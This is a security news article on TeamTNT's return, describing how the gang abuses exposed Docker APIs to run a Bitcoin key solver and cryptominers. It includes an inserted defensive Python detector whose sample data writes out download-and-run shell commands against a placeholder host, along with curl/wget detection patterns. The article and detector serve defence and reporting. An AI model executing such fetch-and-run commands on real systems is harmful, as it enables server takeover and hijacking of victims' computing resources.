TeamTNT is Back and Targeting Servers to Run Bitcoin Crypto Solvers | Security Affairs

AquaSec researchers have observed the cybercriminal gang TeamTNT hijacking servers to run a Bitcoin key solver since early September.

During the first week of September, AquaSec researchers identified at least three different attacks targeting their honeypots, which experts linked to the cybercriminal gang TeamTNT.

The TeamTNT botnet is a crypto-mining malware operation that has been active since April 2020 and targets Docker installations. TeamTNT group activity was detailed by security firm Trend Micro, but in August 2020, Cado Security experts discovered that the botnet is also capable of targeting misconfigured Kubernetes installations.

In January 2021, the cybercrime gang launched a new campaign targeting Kubernetes environments with the Hildegard malware.

The discovery of the recent attacks is significant because on November 6, 2021, TeamTNT announced its farewell on Twitter. Experts pointed out that its infrastructure nevertheless continued to infect new victims automatically, through old worms capable of scanning for and infecting new systems.

The new attacks suggest the hacking group is back in action.

The new TeamTNT attacks aim to hijack servers to run a Bitcoin key solver. Experts tracked the activity as the “Kangaroo attack” because the threat actors were using Pollard’s Kangaroo WIF solver.

Attackers scan for vulnerable Docker daemons, deploy an AlpineOS image, deliver a script (“k.sh”), and fetch the solver from GitHub.

“What we found was that TeamTNT searched for a misconfigured and deployed alpine Docker daemon, a vanilla container image, with a command line to upload a shell script (k.sh) to a C2 server (domain: whatwill[.]be on IP 93[.]95[.]229[.]203),” reads the analysis published by AquaSec. “The shell script clones a GitHub project from what appears to be a TeamTNT account. The project was a bit of a conundrum initially, clarifying that it is a fork of ‘Pollard’s kangaroo for SECPK1’.”

TeamTNT Kangaroo

Pollard’s Kangaroo interval ECDLP solving algorithm appears to be an attempt to break the secp256k1 elliptic-curve cryptography that Bitcoin uses for its public keys. The TeamTNT group uses the computing power of compromised targets to run the ECDLP solver.

The algorithm runs in a distributed manner: the key search is split into chunks that are handed to different nodes (the compromised servers), and the results are collected and written locally to a text file.

“Breaking cryptographic encryption is considered ‘Mission: Impossible.’ If you actually succeed in doing it, you potentially have the keys to almost anything connected online, which could have a devastating effect on the entire world, the Internet,” the experts continue.

According to experts, the hacking gang is probably experimenting with new attack techniques.

AquaSec researchers have also observed the gang reusing attacks attributed to it in the past, such as the Cronb attack, now with new enhancements.

The new variant of “Cronb Attack” is based on a new C2 infrastructure and a new data exchange.

Experts also observed the “What Will Be” attack against their honeypots, in which the threat actor leveraged a misconfigured Docker API to run the alpine vanilla container image with a malicious command designed to download and run the dc.sh shell script.

The attack aims to deploy a cryptominer on the target systems and perform SSH scans over the network.
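Both chains described above (the Kangaroo attack with k.sh and the “What Will Be” attack with dc.sh) start from an exposed Docker API and a vanilla image whose command downloads and executes a remote script. The following is an added defender-side example, not code from the article or from AquaSec: it flags that pattern in `docker inspect`-style container records and checks a `daemon.json` for a TCP listener without TLS client verification. The container records, commands and hostnames are constructed samples.

```python
import re
from urllib.parse import urlparse

# Constructed sample container records in the shape of `docker inspect` output
# (Config.Image / Config.Cmd); hostnames are placeholders, not real IoCs.
SAMPLE_CONTAINERS = [
    {"Id": "c1", "Config": {"Image": "alpine:latest", "Cmd": [
        "/bin/sh", "-c", "wget -q http://downloader.invalid/k.sh -O /tmp/k.sh && sh /tmp/k.sh"]}},
    {"Id": "c2", "Config": {"Image": "alpine:latest", "Cmd": [
        "/bin/sh", "-c", "curl -s http://downloader.invalid/dc.sh | sh"]}},
    {"Id": "c3", "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]}},
]

# Constructed sample daemon configs in the shape of /etc/docker/daemon.json.
# The weak one exposes the unauthenticated API on TCP 2375; the hardened one
# requires client certificates (tlsverify) on the TLS port 2376.
WEAK_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_DAEMON = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True, "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server.pem", "tlskey": "/etc/docker/server-key.pem",
}

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# A downloaded script piped into or chained to a shell, or run from /tmp.
EXECUTE = re.compile(r"(\|\s*(ba)?sh\b|&&\s*(ba)?sh\b|\bsh\s+/tmp/\S+\.sh)")
VANILLA_IMAGES = {"alpine", "busybox", "ubuntu", "debian"}


def is_vanilla_image(image: str) -> bool:
    """True for bare base images (any registry/tag/digest), e.g. 'alpine:latest'."""
    name = image.split("/")[-1].split("@")[0].split(":")[0]
    return name in VANILLA_IMAGES


def suspicious_containers(containers) -> list:
    """Return Ids of containers that pair a vanilla image with a download-and-execute command."""
    hits = []
    for c in containers:
        cfg = c["Config"]
        cmd = " ".join(cfg.get("Cmd") or [])
        if is_vanilla_image(cfg["Image"]) and DOWNLOADER.search(cmd) and EXECUTE.search(cmd):
            hits.append(c["Id"])
    return hits


def exposed_api_hosts(daemon_cfg) -> list:
    """Return tcp:// listeners reachable without TLS client verification."""
    if daemon_cfg.get("tlsverify"):
        return []
    return [h for h in daemon_cfg.get("hosts", []) if urlparse(h).scheme == "tcp"]
```

Run the two checks against real `docker inspect` output and the host's `daemon.json`; a non-empty result from either is worth an alert, since a benign workload rarely needs a base image that fetches and executes a script on start.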

“TeamTNT has been very active between 2020 and 2021. They had used many tools and techniques in their campaigns and launched them frequently. Some of these tools have been designed to evade container environments, steal tokens and credentials, scan and attack local and external networks, hide activities with rootkits, and more,” concludes the report. “Now TeamTNT seems to be back with new tricks. We are still evaluating whether these three attacks are a sign that they have resumed their campaigns against cloud-native environments or not.”

Pierluigi Paganini
